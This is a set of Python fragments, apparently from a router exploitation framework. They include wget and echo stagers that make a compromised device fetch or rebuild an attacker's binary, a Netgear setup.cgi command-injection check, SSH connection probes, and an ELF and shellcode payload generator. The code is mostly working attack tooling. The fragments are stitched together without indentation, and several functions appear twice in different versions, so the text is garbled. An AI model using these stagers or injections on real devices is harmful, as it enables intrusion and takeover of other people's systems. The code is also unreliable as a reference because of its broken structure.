def wget(self):
print_status("Using wget method")
self.binary_name = random_text(8)
if "binary" in self.wget_options.keys():
binary = self.wget_options['binary']
else:
binary = "wget"
# run http server
self.mutex = True
thread = threading.Thread(target=self.http_server,
args=(self.options["lhost"],
self.options["lport"]))
thread.start()
while self.mutex:
pass
if self.port_used:
print_error("Could not set up HTTP Server on {}:{}".format(
self.options["lhost"], self.options["lport"]))
return False
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -O {}/{}".format(
binary, self.options["lhost"], self.options["lport"],
self.binary_name, self.location, self.binary_name)
self.exploit.execute(cmd)
return True
def run(self):
result = {}
rand_str = random_text(10)
cmd = 'echo {}'.format(rand_str)
path = '/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd={}&curpath=/¤tsetting.htm=1'.format(cmd)
response = self.http_request(
method="GET",
path=path
)
if response and rand_str in response.text:
result['ExploitInfo'] = {}
result['ExploitInfo']['URL'] = '{}:{}{}'.format(self.target, self.port, path)
return result
def echo(self):
print_status("Using echo method")
self.binary_name = random_text(8)
path = "{}/{}".format(self.location, self.binary_name)
# echo stream e.g. echo -ne {} >> {}
if "stream" in self.echo_options.keys():
echo_stream = self.echo_options["stream"]
else:
echo_stream = 'echo -ne "{}" >> {}'
# echo prefix e.g. "\\x"
if "prefix" in self.echo_options.keys():
echo_prefix = self.echo_options["prefix"]
else:
echo_prefix = "\\x"
# echo max length of the block
if "max_length" in self.echo_options.keys():
echo_max_length = int(self.echo_options["max_length"])
else:
echo_max_length = 30
size = len(self.payload)
num_parts = int(size / echo_max_length) + 1
# transfer binary through echo command
print_status("Sending payload to {}".format(path))
for i in range(0, num_parts):
current = i * echo_max_length
print_status("Transferring {}/{} bytes".format(
current, len(self.payload)))
block = str(
binascii.hexlify(self.payload[current:current +
echo_max_length]), "utf-8")
block = echo_prefix + echo_prefix.join(
a + b for a, b in zip(block[::2], block[1::2]))
cmd = echo_stream.format(block, path)
self.exploit.execute(cmd)
def wget(self):
print_status("Using wget method")
self.binary_name = random_text(8)
if "binary" in self.wget_options.keys():
binary = self.wget_options['binary']
else:
binary = "wget"
# run http server
all_interfaces = "0.0.0.0"
try:
server = HttpServer((all_interfaces, int(self.options["lport"])), HttpRequestHandler)
except socket.error:
print_error("Could not set up HTTP Server on {}:{}".format(self.options["lhost"], self.options["lport"]))
return False
thread = threading.Thread(target=server.serve_forever, args=(self.payload,))
thread.start()
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -qO {}/{}".format(binary,
self.options["lhost"],
self.options["lport"],
self.binary_name,
self.location,
self.binary_name)
self.exploit.execute(cmd)
thread.join(10)
if thread.is_alive():
assassin = threading.Thread(target=server.shutdown)
assassin.daemon = True
assassin.start()
return False
return True
def echo(self):
print_status("Using echo method")
self.binary_name = random_text(8)
path = "{}/{}".format(self.location, self.binary_name)
# echo stream e.g. echo -ne {} >> {}
if "stream" in self.echo_options.keys():
echo_stream = self.echo_options["stream"]
else:
echo_stream = 'echo -ne "{}" >> {}'
# echo prefix e.g. "\\x"
if "prefix" in self.echo_options.keys():
echo_prefix = self.echo_options["prefix"]
else:
echo_prefix = "\\x"
# echo max length of the block
if "max_length" in self.echo_options.keys():
echo_max_length = int(self.echo_options["max_length"])
else:
echo_max_length = 30
size = len(self.payload)
num_parts = int(size / echo_max_length) + 1
# transfer binary through echo command
print_status("Sending payload to {}".format(path))
for i in range(0, num_parts):
current = i * echo_max_length
print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
block = str(binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8")
block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
cmd = echo_stream.format(block, path)
self.exploit.execute(cmd)
def test_connect(self) -> bool:
""" Test connection to SSH server
:return bool: True if test connection was successful, False otherwise
"""
try:
self.ssh_client.connect(self.ssh_target,
self.ssh_port,
timeout=SSH_TIMEOUT,
username="******",
password=random_text(12),
look_for_keys=False)
except paramiko.AuthenticationException:
self.ssh_client.close()
return True
except Exception as err:
print_error(self.peer,
"SSH Error while testing connection",
err,
verbose=self.verbosity)
self.ssh_client.close()
return False
def ssh_test_connect(self):
ssh_client = self.ssh_create()
try:
ssh_client.connect(self.target,
self.port,
timeout=SSH_TIMEOUT,
username="******",
password=random_text(12),
look_for_keys=False)
except paramiko.AuthenticationException:
ssh_client.close()
return True
except socket.error:
print_error("Connection error")
ssh_client.close()
return False
except Exception as err:
print_error("Err: {}".format(err))
ssh_client.close()
return False
class ArchitectureSpecificPayload(BasePayload):
architecture = None
output = OptString('python', 'Output type: elf/c/python')
filepath = OptString(
"/tmp/{}".format(random_text(8)), 'Output file to write'
)
def __init__(self):
super(ArchitectureSpecificPayload, self).__init__()
if self.architecture not in Architectures:
raise OptionValidationError(
"Please use one of valid payload architectures: {}".format(
Architectures._fields
)
)
self.header = ARCH_ELF_HEADERS[self.architecture]
self.bigendian = True if self.architecture.endswith("be") else False
def run(self):
print_status("Generating payload")
try:
data = self.generate()
except OptionValidationError as e:
print_error(e)
return
if self.output == "elf":
with open(self.filepath, 'wb+') as f:
print_status("Building ELF payload")
content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "c":
print_success("Bulding payload for C")
content = self.generate_c(data)
print_info(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python(data)
print_info(content)
else:
raise OptionValidationError(
"No such option as {}".format(self.output)
)
def generate_elf(self, data):
elf = self.header + data
if elf[4] == 1: # ELFCLASS32 - 32 bit
if self.bigendian:
p_filesz = pack(">L", len(elf))
p_memsz = pack(">L", len(elf) + len(data))
else:
p_filesz = pack("<L", len(elf))
p_memsz = pack("<L", len(elf) + len(data))
content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
elif elf[4] == 2: # ELFCLASS64 - 64 bit
if self.bigendian:
p_filesz = pack(">Q", len(elf))
p_memsz = pack(">Q", len(elf) + len(data))
else:
p_filesz = pack("<Q", len(elf))
p_memsz = pack("<Q", len(elf) + len(data))
content = elf[:0x60] + p_filesz + p_memsz + elf[0x70:]
return content
@staticmethod
def generate_c(data):
res = "unsigned char sh[] = {\n \""
for idx, x in enumerate(data):
if idx % 15 == 0 and idx != 0:
res += "\"\n \""
res += "\\x%02x" % x
res += "\"\n};"
return res
@staticmethod
def generate_python(data):
res = "payload = (\n \""
for idx, x in enumerate(data):
if idx % 15 == 0 and idx != 0:
res += "\"\n \""
res += "\\x%02x" % x
res += "\"\n)"
return res
def ssh_test_connect(self):
ssh_client = self.ssh_create()
try:
ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, username="******", password=random_text(12), look_for_keys=False)
except paramiko.AuthenticationException:
ssh_client.close()
return True
except socket.error:
print_error("Connection error", verbose=self.verbosity)
ssh_client.close()
return False
except Exception as err:
print_error("Err: {}".format(err), verbose=self.verbosity)
ssh_client.close()
return False
def test_connect(self) -> bool:
""" Test connection to SSH server
:return bool: True if test connection was successful, False otherwise
"""
try:
self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, username="******", password=random_text(12), look_for_keys=False)
except paramiko.AuthenticationException:
self.ssh_client.close()
return True
except Exception as err:
print_error(self.peer, "SSH Error while testing connection", err, verbose=self.verbosity)
self.ssh_client.close()
return False
